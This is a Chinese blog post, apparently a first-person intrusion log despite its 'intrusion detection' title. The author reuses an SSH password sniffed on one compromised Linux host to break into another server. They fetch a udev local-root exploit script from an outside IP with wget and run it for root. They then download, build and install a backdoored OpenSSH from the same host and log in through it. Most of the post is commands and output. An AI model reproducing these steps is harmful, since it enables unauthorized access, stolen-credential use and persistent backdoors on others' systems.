linux肉鸡程序检查,一台linux肉鸡的简单手工入侵检测过程

今天发现一台肉鸡上某人的ssh连到另外一台服务器上，记录下了密码。

[root@mail ~]# cat /tmp/sshpswd

ldc:sle823jfsGs@222.222.66.11

直接ssh上去。

[root@mail ~]# ssh ldc@222.222.66.11

ldc@222.222.66.11s password:

Last login: Fri Jul 17 13:11:38 2009 from 221.140.140.200

[ldc@localhost ldc]$ cat /etc/issue

Red Hat Enterprise linux Server release 5 (Tikanga)

Kernel on an m

[ldc@localhost ldc]$ uname -a

linux localhost.localdomain 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686 i686 i386 GNU/linux

是rhel5.0没升级过内核，vmsplice的local root应该可以的，不过测试了下，机器挂了，换udev的好了。

[ldc@localhost ldc]$ mkdir .v

[ldc@localhost ldc]$ cd .v

[ldc@localhost .v]$ wget http://211.100.50.70/u.sh

13:21:09 http://211.100.50.70/u.sh

Connecting to 211.100.50.70:80… .. 200 OK

366 (3.3K) [application/x-sh]

Saving to: `u.sh’

100%[===========================================================================================>] 3,366 --.-K/s in 0.04s

13:21:09 (93.7 KB/s) - `u.sh saved [3366/3366]

[ldc@localhost .v]$ ls

r00t r00t.c u.sh

[ldc@localhost .v]$ chmod +x u.sh

[ldc@localhost .v]$ cat /proc/net/netlink

sk Eth Pid Groups Rmem Wmem Dump Locks

f69f8800 0 2486 00000111 0 0 00000000 2

f7fdae00 0 0 00000000 0 0 00000000 2

c2132200 6 0 00000000 0 0 00000000 2

f6a57a00 7 2143 00000001 0 0 00000000 2

f7caf000 7 0 00000000 0 0 00000000 2

f6a0be00 9 2143 00000000 0 0 00000000 2

f6a61200 9 1996 00000000 0 0 00000000 2

f7de1c00 9 0 00000000 0 0 00000000 2

f7d6ca00 10 0 00000000 0 0 00000000 2

f7fb3200 11 0 00000000 0 0 00000000 2

c2154200 15 476 ffffffff 0 0 00000000 2

f7fdac00 15 0 00000000 0 0 00000000 2

f7fb3000 16 0 00000000 0 0 00000000 2

c21cde00 18 0 00000000 0 0 00000000 2

[ldc@localhost .v]$ ps aux | grep udev

root 477 0.0 0.0 2916 1396 ? S< 12:36 0:00 /sbin/udevd -d

ldc 3462 0.0 0.0 4128 680 pts/0 S 13:00 0:00 grep udev

[ldc@localhost .v]$ sh u.sh 476

suid.c:

suid.c:3:

sh-3.1# id

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:SystemLow-SystemHigh

已经是root权限了。

我们先留个ssh的后门。

sh-3.1# wget http://211.100.50.70/openssh4.3p2.tar.gz

13:32:08 http://211.100.50.70/openssh4.3p2.tar.gz

Connecting to 211.100.50.70:80… 200 OK

79990 (957K) [application/x-gzip]

Saving to: `openssh4.3p2.tar.gz’

100%

[===========================================================================================>] 979,990 1.14M/s in 0.8s

13:32:08 (1.14 MB/s) - `openssh4.3p2.tar.gz saved [979990/979990]

sh-3.1# tar zxf openssh4.3p2.tar.gz

sh-3.1# cd openssh-4.3p2/

sh-3.1# ./configure --prefix=/usr --sysconfdir=/etc/ssh

checking for gcc... gcc

checking for C compiler default output file name... a.out

............(省略若干行)

sh-3.1# make && make install

conffile=`echo sshd_config.out | sed s/.out$//`;

/bin/sed -e s|/etc/ssh/ssh_prng_cmds|/etc/ssh/ssh_prng_cmds|g -e

............(省略若干行)

sh-3.1# cp ssh_config sshd_config /etc/ssh/

sh-3.1# /etc/rc.d/init.d/sshd restart

STOP sshd [OK]

START sshd [OK]

ok了，用我们的sshdoor登录。

[root@localhost ~]# id

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:SystemLow-SystemHigh

[root@localhost ~]# netstat -lntp

Active Internet connections (only servers)

Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name

tcp 0 0 127.0.0.1:2208 0.0.0.0:* LISTEN 2298/hpiod&

本文来自互联网用户投稿，文章观点仅代表作者本人，不代表本站立场，不承担相关法律责任。如若转载，请注明出处。 如若内容造成侵权/违法违规/事实不符，请点击【内容举报】进行投诉反馈！